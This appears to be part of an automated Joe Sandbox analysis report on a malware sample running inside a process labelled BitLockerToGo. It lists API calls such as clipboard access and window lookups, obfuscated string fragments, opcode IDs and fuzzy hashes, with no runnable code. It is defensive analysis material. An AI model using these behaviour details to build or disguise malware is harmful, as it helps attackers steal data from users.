                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InformationVolume
                                                                                                      • String ID:
                                                                                                      • API String ID: 2039140958-0
                                                                                                      • Opcode ID: f32fbd1f96f39cba9b7c7bf492129bfd39b36efef325d538d9f6236e9abdf8ff
                                                                                                      • Instruction ID: 20f4974a1b66aab9a794fa07b24c3f8c1e65480b4df5a2899c41e708d99b2540
                                                                                                      • Opcode Fuzzy Hash: f32fbd1f96f39cba9b7c7bf492129bfd39b36efef325d538d9f6236e9abdf8ff
                                                                                                      • Instruction Fuzzy Hash: 5FD04C34BC0301B6F5311B116D03F2526155752F57F300165BB453C1E3A6E57655D56D
                                                                                                      APIs
                                                                                                      • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043D016
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: BlanketProxy
                                                                                                      • String ID:
                                                                                                      • API String ID: 3890896728-0
                                                                                                      • Opcode ID: 90c690eb5f84e481181132682a37fa368dc52d86d0bef32f5beee5f5cff6a508
                                                                                                      • Instruction ID: 030883676bd727497d3d569c441341cbeb05adf045116bcd78c101c65807591f
                                                                                                      • Opcode Fuzzy Hash: 90c690eb5f84e481181132682a37fa368dc52d86d0bef32f5beee5f5cff6a508
                                                                                                      • Instruction Fuzzy Hash: 2ED04C343D4304B7F2310B15EC17F0535157742F03F201021B781BC0E189F26220961E
                                                                                                      APIs
                                                                                                      • SysFreeString.OLEAUT32(?), ref: 0043D49A
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: FreeString
                                                                                                      • String ID:
                                                                                                      • API String ID: 3341692771-0
                                                                                                      • Opcode ID: dce5343581c555c157c084f6ca29dc8ca6a4622afdabdf873cb1a49e7f8e738f
                                                                                                      • Instruction ID: 1b828c0c754d10f76823e82649a43e7c6d79b885f9c2b52c5db0f1ca39ad390f
                                                                                                      • Opcode Fuzzy Hash: dce5343581c555c157c084f6ca29dc8ca6a4622afdabdf873cb1a49e7f8e738f
                                                                                                      • Instruction Fuzzy Hash: 4CD0C978005300DFC7009FA0D84CA0ABBB4FF8A306F1088A8F54987321CB36D881CF12
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: "$($0$8$9$:$;$=$A$C$E$F$G$I$K$L$M$O$Q$S$U$W$Y$[$]$]$_$a$b$b$e$e$f$g$h$i$k$m$o$q$q$r$s$s$t$u$u$u$w$w$x$x$y$y${$|$}
                                                                                                      • API String ID: 0-2883926043
                                                                                                      • Opcode ID: 9b744aa167b6ce47d4037d1fc40b597c5bad1e8f910a236c1d59013e09a742d9
                                                                                                      • Instruction ID: cdf08248a576656c39d75a6f4e2f02b4a5b6f944e770dc15bb1f54a4ae94bd3d
                                                                                                      • Opcode Fuzzy Hash: 9b744aa167b6ce47d4037d1fc40b597c5bad1e8f910a236c1d59013e09a742d9
                                                                                                      • Instruction Fuzzy Hash: CDF1FD11D0CBE989DB32C67C4C0878DAE611B67234F0843D9D5F96B3D3C7690A46CB66
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $ $ $ $ $ $ $-$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff$gfff$gfff
                                                                                                      • API String ID: 0-3131871939
                                                                                                      • Opcode ID: 4688b2b43ab63ef7a6da01349447995b98ef1e8e7db967d5f962d2d7eb776118
                                                                                                      • Instruction ID: 101777ef22c6754d8b64c349831144d5e0a61e6f468e081381994eb0c170f9ac
                                                                                                      • Opcode Fuzzy Hash: 4688b2b43ab63ef7a6da01349447995b98ef1e8e7db967d5f962d2d7eb776118
                                                                                                      • Instruction Fuzzy Hash: 14E2D2716083418FC718CF28C49436BBBE2AF95314F18867EE495AB3D1D778D949CB8A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 0$0$0$0000$0000$0000$0000$0000$0000$0000$@$i
                                                                                                      • API String ID: 0-3385986306
                                                                                                      • Opcode ID: 65c16c820dce1ae3625c06e07f09781a243bba19fb310a7a978dede541b496ef
                                                                                                      • Instruction ID: 4d6bdc42018c4a28e09230ae5d0a04ff3b45407d7efb1100c08bd1b15f26d520
                                                                                                      • Opcode Fuzzy Hash: 65c16c820dce1ae3625c06e07f09781a243bba19fb310a7a978dede541b496ef
                                                                                                      • Instruction Fuzzy Hash: C582D5756093418FC719CF28C69431BBBE1AB85304F18896EE8D6A73D1D3B8DD05CB8A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $ $-"# $1674$45$PWVU$XtF%$\CBA$\_$`gfe$+Jm
                                                                                                      • API String ID: 0-3479896102
                                                                                                      • Opcode ID: 5b4d1f6faef5ae051ffae9defdcf1eb46bd6fdda3526dca2913e36242a63e034
                                                                                                      • Instruction ID: 5d0a47c5e0c3e3785d427f867843ae8bcebfb36953a6f4919a5c5fbf58e27a41
                                                                                                      • Opcode Fuzzy Hash: 5b4d1f6faef5ae051ffae9defdcf1eb46bd6fdda3526dca2913e36242a63e034
                                                                                                      • Instruction Fuzzy Hash: 3EB211716083918BD734CF24D4907ABBBE1EFD6304F58892EE5C94B392D7789806CB96
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ,(^^$-XnS$Za]X$fd^f$fgK6$oRSV$p8&B$r}C}$txZf$wyEH$}I{@
                                                                                                      • API String ID: 0-470552829
                                                                                                      • Opcode ID: 9ee0638cf791ae6d5ac550f064677e4fd8b5e0a38782ee2158a426bd98c376ed
                                                                                                      • Instruction ID: 6e8fcdc7c84374f398573be5ad3b15c743a66361e7c5e2ae8c176c55dde69fc1
                                                                                                      • Opcode Fuzzy Hash: 9ee0638cf791ae6d5ac550f064677e4fd8b5e0a38782ee2158a426bd98c376ed
                                                                                                      • Instruction Fuzzy Hash: 0E91E3719087908FC311CF19C84036BBFE1AF96744F4889ADE4D59B392D379C90ACB96
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ,-$A%J'$E!T#$L)H+$\_$^gfa$iM:-$iM:-$mM:-$mM:-
                                                                                                      • API String ID: 0-2966039890
                                                                                                      • Opcode ID: a00bc7510a44e6df76238fc949364e2bef2a3cfd54a9ef932b01d9df0da7e771
                                                                                                      • Instruction ID: dedf167a1ca8a349267ab0eb51d00d33798c86cfa8a0eef8d8b3954052b7217a
                                                                                                      • Opcode Fuzzy Hash: a00bc7510a44e6df76238fc949364e2bef2a3cfd54a9ef932b01d9df0da7e771
                                                                                                      • Instruction Fuzzy Hash: 0BC1F0B46083208BD714CF15E89132BB7F2EFD1758F44991DE8D68B7A5E3788901CB8A
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Clipboard$CloseDataLongOpenWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 1647500905-0
                                                                                                      • Opcode ID: e1fee2fdb7fb72ada143bf87540b49babc550f6b33082eda00e96af8d1747cf3
                                                                                                      • Instruction ID: 84ece636a3eef83145fc2dad74e5b9c0923b27b2c571d48a86f905ad45eb7284
                                                                                                      • Opcode Fuzzy Hash: e1fee2fdb7fb72ada143bf87540b49babc550f6b33082eda00e96af8d1747cf3
                                                                                                      • Instruction Fuzzy Hash: C251D5B18087829FD700AFBCD84935EBFA0AB56310F05C77AD4A897281D3789955C7A7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: w1u$$W U$+[&Y$=O?M$c/g-$cS'Q
                                                                                                      • API String ID: 0-2813094053
                                                                                                      • Opcode ID: 55217b66b17e640bfe096e495a78d40d4ba958f98e838a1a98ec98583b2e6d0a
                                                                                                      • Instruction ID: 5dae62b9228fec28a9aa82381c3f9ceab3785b376a03225bc493eb3c3bcfb441
                                                                                                      • Opcode Fuzzy Hash: 55217b66b17e640bfe096e495a78d40d4ba958f98e838a1a98ec98583b2e6d0a
                                                                                                      • Instruction Fuzzy Hash: 6612DEB4A00219CFEB24DFA5D891BAEBBB1FB06310F1444AEE505AB391D7389941CB59
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: $28809E1F0843EFDDDD1428A490EDDE47$G#$Kf$d$|s
                                                                                                      • API String ID: 0-3992657789
                                                                                                      • Opcode ID: 1c2170ef204c581342434af7aa4ff98358fb2a1dc15a7a718998a0f2b389e939
                                                                                                      • Instruction ID: 6f1c9757a37f616ea49923a073a8a058545dcbf7e76372bab92b43a30f122c44
                                                                                                      • Opcode Fuzzy Hash: 1c2170ef204c581342434af7aa4ff98358fb2a1dc15a7a718998a0f2b389e939
                                                                                                      • Instruction Fuzzy Hash: B0D1E2B16493808BE314DF65C88175FBBE2BBC5718F04892DE0C99B385D779850ACB5B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: FnCB$Jzu4$T{^,$Y@iF$kfhM$sV*E
                                                                                                      • API String ID: 0-2230338378
                                                                                                      • Opcode ID: a21649f3756e43578c7be99839bf2d4a572c3e337a8a87199a1250fc8870d453
                                                                                                      • Instruction ID: cc00998c965b794c5a77ebefedb7e9d070f0e7665da5499548324cf67911bcac
                                                                                                      • Opcode Fuzzy Hash: a21649f3756e43578c7be99839bf2d4a572c3e337a8a87199a1250fc8870d453
                                                                                                      • Instruction Fuzzy Hash: 63A1F2B4600741CFD7249F66E890227BBF0FF1A310F148AADD9824B792D738E856CB95
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: InA>$]YZT$^YKK$bjB$yyom
                                                                                                      • API String ID: 0-3406653770
                                                                                                      • Opcode ID: 9ed2c56fa0c1bfeb8ab10911209b64402a1783de0baae1ced6889a9d2dcf866b
                                                                                                      • Instruction ID: 618d43bfbe89843756a41a18f5c79527d519436f14345f74dd6cef589af83a17
                                                                                                      • Opcode Fuzzy Hash: 9ed2c56fa0c1bfeb8ab10911209b64402a1783de0baae1ced6889a9d2dcf866b
                                                                                                      • Instruction Fuzzy Hash: 6C42ED75E04226CFDB148F68EC907AEB7B1FF4A311F1944B9D845A7390E778A980CB58
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: %&' $0765$InA>$L$x
                                                                                                      • API String ID: 0-3649279264
                                                                                                      • Opcode ID: fdd75df9641993fa35da3e09cfa9c55a01c90a312ab9a87e11623565d44fc49f
                                                                                                      • Instruction ID: 925dd468c5c2c64aa626f7b252e69b717d32438011a012a7f015de1fcb36ff14
                                                                                                      • Opcode Fuzzy Hash: fdd75df9641993fa35da3e09cfa9c55a01c90a312ab9a87e11623565d44fc49f
                                                                                                      • Instruction Fuzzy Hash: E842F5316083514FD315CE28D89076FBBE1ABD5314F19C92DE4EA9B392DB78C846CB86
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: -$0123456789ABCDEFXP$0123456789abcdefxp$gfff$gfff
                                                                                                      • API String ID: 0-3620105454
                                                                                                      • Opcode ID: 1600b9b73e1175bdb8f038b483b4f66fc6b7b1b9cb751b2cc8175e02197529e6
                                                                                                      • Instruction ID: 91f746329fa6188a5dbc8e2170b1b7322da1766379b05b56bd4c62466398d73b
                                                                                                      • Opcode Fuzzy Hash: 1600b9b73e1175bdb8f038b483b4f66fc6b7b1b9cb751b2cc8175e02197529e6
                                                                                                      • Instruction Fuzzy Hash: F2E1A07160C3918FC715CF29C48026AFBE1AFD9314F088A7EE8D997392D278D945CB96
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 0ki$H$[V$SQ$_-]
                                                                                                      • API String ID: 0-818067795
                                                                                                      • Opcode ID: b3a30cd76f3299051ec3e371df925a722e728753bef723751a11276652000179
                                                                                                      • Instruction ID: c6edb9dd8bee26b61ab89cc62677d965e4c9a2540bb0a5073caa283601ed92a2
                                                                                                      • Opcode Fuzzy Hash: b3a30cd76f3299051ec3e371df925a722e728753bef723751a11276652000179
                                                                                                      • Instruction Fuzzy Hash: 3FC1F57164C3918FD714CF26849136BBBE1AFD6314F188D3EE4D56B392D73988068B86
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: GL$U+a)$l9E7$qM$yD
                                                                                                      • API String ID: 0-27879146
                                                                                                      • Opcode ID: 01805e651e2433d2a9b80c34230d459257b34ccedcf5c812e09d87e005dbed66
                                                                                                      • Instruction ID: ca29b0192270aa17c1a08736b621eaaf00a28f86d48e767ab8534998b3b957c6
                                                                                                      • Opcode Fuzzy Hash: 01805e651e2433d2a9b80c34230d459257b34ccedcf5c812e09d87e005dbed66
                                                                                                      • Instruction Fuzzy Hash: A3A1E0B56083508BC720DF14D89166BB7F0FFA5394F58891EE8D58B3A0E738D941CB96
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ($IFAJ$IWWL$ZCQ_$j
                                                                                                      • API String ID: 0-1951835913
                                                                                                      • Opcode ID: 7a21a4f41201c95f4dccd046a8f5d879dcc4fc92b8cb9af9a002f38fea991a53
                                                                                                      • Instruction ID: 07db9b42ffc1dd3634fb4685f09981e1d91c9e5e5817189593b6d0cf5111df59
                                                                                                      • Opcode Fuzzy Hash: 7a21a4f41201c95f4dccd046a8f5d879dcc4fc92b8cb9af9a002f38fea991a53
                                                                                                      • Instruction Fuzzy Hash: 6651AC7094D3C18AD3118F79919031BFFE0AFA3744F18596DE9D15B392C37A880A8BA7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: \XL#$vT^8
                                                                                                      • API String ID: 0-3953467014
                                                                                                      • Opcode ID: fa0a560b0d5780c97efee5d52ab3b8a3b822f24730492086bd8a94531f410b7f
                                                                                                      • Instruction ID: 57a71d74ee427431f489d48addf34d37bbc4b925b021e423932a124b2761f429
                                                                                                      • Opcode Fuzzy Hash: fa0a560b0d5780c97efee5d52ab3b8a3b822f24730492086bd8a94531f410b7f
                                                                                                      • Instruction Fuzzy Hash: A23246716047418FE3288F398861763BBE1EF56314F988A7ED4EB87781D739A409CB19
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID: InA>$InA>$f
                                                                                                      • API String ID: 2994545307-1036101952
                                                                                                      • Opcode ID: 15ff9f160a7f1e179a2c1dda476f79951dd5bced9404928d038a90f1c3e91311
                                                                                                      • Instruction ID: eada88a9e754f0b699147cfd8b59f79c9ae10e08668ba566d084d8babfb7ed7f
                                                                                                      • Opcode Fuzzy Hash: 15ff9f160a7f1e179a2c1dda476f79951dd5bced9404928d038a90f1c3e91311
                                                                                                      • Instruction Fuzzy Hash: BA32DF716083419FE718CF19C890B2BBBE2BBC4314F188A2EF59597391D778E815CB96
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ' ".$,\ y$6T^z
                                                                                                      • API String ID: 0-934940848
                                                                                                      • Opcode ID: 55662d2eee3844fe340020642a98afed61bdf3ee388b44c64959a4d0558ad975
                                                                                                      • Instruction ID: 40272a1a04bacee1c2f5f7e13e82b8802516d34c0f3134ea436c20c75656e19d
                                                                                                      • Opcode Fuzzy Hash: 55662d2eee3844fe340020642a98afed61bdf3ee388b44c64959a4d0558ad975
                                                                                                      • Instruction Fuzzy Hash: D7D17634109B808FE726CF358490BA3BBF1AF17304F08599EC0D69B796D7796509CB6A
                                                                                                      APIs
                                                                                                      • FindWindowExW.USER32(00000000,00000000,27992596,00000000), ref: 0041F6C9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: FindWindow
                                                                                                      • String ID: 2A
                                                                                                      • API String ID: 134000473-225269067
                                                                                                      • Opcode ID: b1e6552f4389aedd898ee417c4df0c25ae248403fb7fe59854366b577d759dd8
                                                                                                      • Instruction ID: 03d653aeb1072bd1fa51a38f7b8c16b9e6401b8681793a4192e587a724a43fb0
                                                                                                      • Opcode Fuzzy Hash: b1e6552f4389aedd898ee417c4df0c25ae248403fb7fe59854366b577d759dd8
                                                                                                      • Instruction Fuzzy Hash: BB3107B090C3809BD364DF11D5953DBBBE0AB99314F008A2DD5C94B291DBB854898F8A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ($+,B
                                                                                                      • API String ID: 0-2369276322
                                                                                                      • Opcode ID: 6457bee3e67b01bf29251144948ae2f291ebac9cbb565796ace7aef5a070f109
                                                                                                      • Instruction ID: 77d96dbb9c414bf2044c868896409b32bbb8e061ad65e57e15bbae98b4123eba
                                                                                                      • Opcode Fuzzy Hash: 6457bee3e67b01bf29251144948ae2f291ebac9cbb565796ace7aef5a070f109
                                                                                                      • Instruction Fuzzy Hash: 50E11571608340ABE3009F25ED46BAFBBE5EBC1314F04492EF8C4A7382D6799915DB97
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: Inf$NaN
                                                                                                      • API String ID: 0-3500518849
                                                                                                      • Opcode ID: 4b104573bd4281e8ebb78a881f58aad0d5e870ac47b1f6e06d92ad9047848aff
                                                                                                      • Instruction ID: 35161cd067e3d6d7ad92fb50c8ff14103f2dec0eace6961543bdc50c057c482b
                                                                                                      • Opcode Fuzzy Hash: 4b104573bd4281e8ebb78a881f58aad0d5e870ac47b1f6e06d92ad9047848aff
                                                                                                      • Instruction Fuzzy Hash: 64D1D372A083119BC704CF28C88061BBBE5EFC4750F158A3EE899A73D1E774DD458B86
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 55%0$BD:G
                                                                                                      • API String ID: 0-1772350360
                                                                                                      • Opcode ID: 70c603a857197f9f7199bdc5dbbc5f203cc7da2074535ec6ff539010a0e18ad4
                                                                                                      • Instruction ID: 941c804faae5e40cf88cde5dfc0ce70c5862e4716955870b140fd15e4ac2f900
                                                                                                      • Opcode Fuzzy Hash: 70c603a857197f9f7199bdc5dbbc5f203cc7da2074535ec6ff539010a0e18ad4
                                                                                                      • Instruction Fuzzy Hash: 22B101B59083918FC720CF24E89122FBBE1BF86304F54896EE4D597392D738D805CB96
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: InitializeThunk
                                                                                                      • String ID: %&' $%&'
                                                                                                      • API String ID: 2994545307-1644610688
                                                                                                      • Opcode ID: 6cb29f9be049b2daea8036079ccbe6322cfcbf98a61b5d92b5e418aa2c0f12c7
                                                                                                      • Instruction ID: ff06d827dba4c023fc007a2fb221661add5a207178b80d781694405577099a2a
                                                                                                      • Opcode Fuzzy Hash: 6cb29f9be049b2daea8036079ccbe6322cfcbf98a61b5d92b5e418aa2c0f12c7
                                                                                                      • Instruction Fuzzy Hash: 6E812730A083009BF724DF25DC41BBBB7E1EF99715F14882EF59983392E634A950C75A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: yq$wq
                                                                                                      • API String ID: 0-206952631
                                                                                                      • Opcode ID: b6196fb0067fc78bf90a0a5ff9dde58f3e821ad999a73888a02e9118fe66c26e
                                                                                                      • Instruction ID: 287e9a93f4074805a0b28ccd02382063b1b236e174ccb2d48d0b01b9ee58f6bd
                                                                                                      • Opcode Fuzzy Hash: b6196fb0067fc78bf90a0a5ff9dde58f3e821ad999a73888a02e9118fe66c26e
                                                                                                      • Instruction Fuzzy Hash: 81A1ACB15083418BE324CF11C8917AFFBE0FF85708F58891EE5C92B691D7B99844CB8A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_BitLockerToGo.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: WU$_]
                                                                                                      • API String ID: 0-3594180508
                                                                                                      • Opcode ID: 1d227a5d0b7a1b7092b5bfa78f3537f3db915659530e68ac89217b35aef323db
                                                                                                      • Instruction ID: 1ed77a55836705301485bd332bc6ea46d439ff165b2adabd5a8120a767d39ce0
                                                                                                      • Opcode Fuzzy Hash: 1d227a5d0b7a1b7092b5bfa78f3537f3db915659530e68ac89217b35aef323db
                                                                                                      • Instruction Fuzzy Hash: 0221BEA06083118BD3108F10D46233BB7B1FFA2784F08595DE5C11F7A5E3BE8941CB9A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.2023802669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
